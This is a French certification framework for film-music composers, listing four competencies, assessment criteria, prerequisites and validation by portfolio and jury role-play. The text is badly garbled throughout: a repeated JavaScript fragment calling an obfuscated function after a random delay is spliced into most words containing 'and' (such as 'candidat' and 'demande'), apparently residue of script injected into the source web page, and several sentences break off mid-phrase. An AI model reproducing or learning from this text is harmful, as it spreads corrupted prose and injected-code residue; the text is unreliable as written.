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REFERENTIEL COMPETENCES ET EVALUATION MUSIQUE DE FILM

Notre certification se décompose en quatre compétences principales :

(1)  Compose dans des styles diversifiés

  • Change de style à la demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande d’un réalisateur (classique, contemporain, jazz, pop-rock, tonal, atonal, etc.)
  • Compose des thèmes impactants et mémorisables pour toucher son public et fidéliser ses clients
  • Fait sonner les instruments, les combine, les programme, ou les fait jouer, pour obtenir un beau son avec son ordinateur
  • Analyse le style des autres compositeurs afin de s’approprier le langage et la sonorité appropriés pour répondre aux attentes de la
  • Crée, entretien et utilise un catalogue mis à jour de références cinématographiques dans toutes les catégories de scènes, action, suspense, émotion, dérision, comique, attente, chanson, afin d’en connaître les codes culturels et les tendances du moment. Et ceci dans tous les secteurs, fiction, animation, jeu vidéo, documentaire, etc.

 

(2) Fusionne, optimise, finalise sa musique avec l’image selon quatre critères fondamentaux (tempo, quantité d’information, intentions, goûts musicaux du réalisateur)

  • Comprend une scène de film/un scénario pour et propose une musique qui traduit la même intention
  • Détecte le tempo de l’image, du montage et adapte sa musique à ce même tempo afin de réaliser la fusion musique-image
  • Analyse la quantité d’information utilisée par l’image et les dialogues et en déduit celle qui reste pour la musique. Ni trop, ni trop peu, afin que tous les éléments du films soient en harmonie. (jeu d’acteur, dialogues, bruitages, etc.)
  • Intègre le ressenti subjectif du réalisateur pour comprendre et exécuter ses
  • Implique le réalisateur dans le processus créatif pour mieux le connaître avec un processus de propositions en direct
  • Propose de nombreuses variantes pour découvrir les goûts musicaux du réalisateur et des intervenants (producteur, responsable de chaine, distributeur, etc.)

 

(3) Produit sa musique (le compositeur d’aujourd’hui livre un produit fini en sortie d’ordinateur, enregistré et mixé, prêt à diffuser)

  • Utilise rapidement une grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande bibliothèque de sons capable de simuler des instruments dans tous les styles, y compris ethniques
  • Utilise un logiciel de MAO, musique assistée par ordinateur en enregistrement, arrangement et mixage
  • compose en synchronisation avec l’image et adapte le tempo et les mesures en conséquence
  • Choisit, édite et combine les sons d’instruments pour obtenir une sonorité et un phrasé réalistes (réaliste : qui ressemble aux instruments acoustiques joués par des musiciens, exemple : violon, trompette, clarinette)
  • Mixe sa musique. Compresse la dynamique, ajuste les fréquences, l’équilibre des instruments, la spécialisation, etc.
  • Réalise parfois l’enregistrement, l’arrangement et le mixage d’une chanson

 

(4)  Construit et entretien son réseau en permanence

  • Parle de lui comme un spécialiste capable de polyvalence en conciliant opportunisme et image d’expert
  • Valorise son parcours pour se faire connaître. Met à jour un support de communication vidéo et audio et une biographie.
  • Développe un réseau et crée une routine pour l’entretenir, autant par internet que par les évènements locaux.
  • Calcule ses devis de composition et de réalisation en fonction du type de production. Le négocie et l’adapte aux opportunités. (exemple : court métrage autofinancé ou film publicitaire d’une multinationale)
  • Lit et parfois rédige les documents juridiques et réglementaires de la Il réclame, le cas échéant, ses impayés.

 

=> Toutes les compétences sont évaluées

 

Type : Mise en situation professionnelle : création de musiques à l’image pour divers extraits de films + une chanson + présentation au jury d’une stratégie de développement de carrière + jeu de rôle (soutenance)

 

Principaux critères :

  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat peut changer de style à la demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande pour s’adapter au sujet
  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat propose des thèmes impactants et faciles à mémoriser
  • Les musiques ont une bonne sonorité orchestrale
  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat peut s’approprier le style d’un autre compositeur
  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat possède un catalogue à jour de références cinématographiques dans toutes les catégories de scènes.
  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat comprend les scènes de films et sait analyser un scénario et en traduire l’intention
  • Il propose des musiques qui fusionnent avec le tempo de l’image et du
  • La musique respecte la quantité d’information. Ni trop, ni trop
  • La musique respecte le ressenti subjectif du réalisateur et exécute ses
  • Le réalisateur est invité à s’impliquer dans le processus créatif
  • De nombreuses variantes sont proposées
  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat possède une bibliothèque de sons capable de simuler des instruments dans tous les styles, y compris ethniques
  • Le fonctionnement d’un logiciel de MAO est acquis
  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat sait composer en synchronisation avec l’image et sait adapter le tempo et les mesures en conséquence
  • Les musiques ont une sonorité et un phrasé réalistes
  • Les mixages sont équilibrés et sonnent bien
  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat présente la réalisation d’une chanson
  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat présente des musiques diversifiées mais aussi avec une forte spécialisation
  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat présente un support de communication vidéo et audio et une biographie
  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat possède ses méthodes et attitudes pour développer un réseau et possède sa routine pour l’entretenir, autant par internet que par les évènements locaux.
  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat explique comment il calcule un devis de composition et de réalisation en fonction du type de production. Est-il bien négocié et adapté aux opportunités ? Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat présente les aspects juridiques et réglementaires de la profession. Il sait répondre aux questions usuelles et connaît les protocoles.

 

Prérequis à la validation des compétences

  • Le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat est déjà un compositeur.
  • Il sait arranger et orchestrer en MAO, (musique assistée par ordinateur)
  • Il a une expérience de composition de musique à l’image d’au moins une année.
  • Il possède une station de travail en MAO adaptée
  • Les compétences sont testées mais aucun diplôme n’est demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andé afin de permettre aux autodidactes d’accéder à la certification.

Cette certification est destinée aux musiciens qui sont déjà des compositeurs confirmés et qui souhaitent une spécialisation vers la composition de musique à l’image.

 

Périmètre de la validation partielle

Chacune des quatre compétences fondamentales peut faire l’objet d’un module de formation et d’une validation partielle de la certification.

Cette certification est ouverte à la validation de l’expérience.

La modalité de validation des compétences, partielle ou VE, n’est pas différente du  mode général (pour des raisons de simplicité)

 

Modalités de validation des compétences manquantes

Dépôt de dossier et soutenance devant un jury d’examen.

Type : Mise en situation professionnelle : création de musiques à l’image pour divers extraits de films + une chanson + présentation au jury d’une stratégie de développement de carrière + jeu de rôle (soutenance)

Ce que contient le dossier :

 Les divers extraits de films Une chanson créée à l’image

La rédaction d’une stratégie de développement de carrière

Le contenu de ce dossier est remis au jury bien à l’avance et ne nécessite pas d’entretien avec le candom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andidat

 

Ce que contient la soutenance devant le jury :

 Un jeu de rôle, mise en situation, pour évaluer les compétences de type : Comprend la demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande du réalisateur et s’adapte immédiatement…

Négocie adroitement un contrat…

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